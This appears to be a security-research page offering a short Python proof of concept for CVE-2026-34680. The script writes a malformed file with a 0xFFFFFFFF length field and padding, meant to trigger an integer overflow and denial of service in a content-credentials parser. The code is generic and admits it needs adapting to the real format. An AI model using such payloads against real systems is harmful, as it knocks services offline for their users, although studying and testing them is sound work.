⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual Proof of Concept for CVE-2026-34680 # This script demonstrates a potential trigger for an Integer Overflow import struct def generate_malicious_input(filename): """ Generates a file with a payload designed to trigger an integer overflow. Adjust the structure based on the actual file format parsed by the vulnerable component. """ # Simulate a header with a length field that causes overflow # Example: A size field set to 0xFFFFFFFF which might wrap around to 0 when incremented overflow_trigger = 0xFFFFFFFF # Constructing a dummy payload. In a real scenario, this would match the specific format (e.g., JSON, binary) # expected by CAI Content Credentials. payload = struct.pack('<I', overflow_trigger) # Little-endian unsigned int payload += b"A" * 100 # Padding with open(filename, 'wb') as f: f.write(payload) print(f"[+] Malicious file generated: {filename}") print(f"[+] Attempt to process this file with the vulnerable application to trigger the DoS.") if __name__ == "__main__": generate_malicious_input("cve_2026_34680_poc.bin")
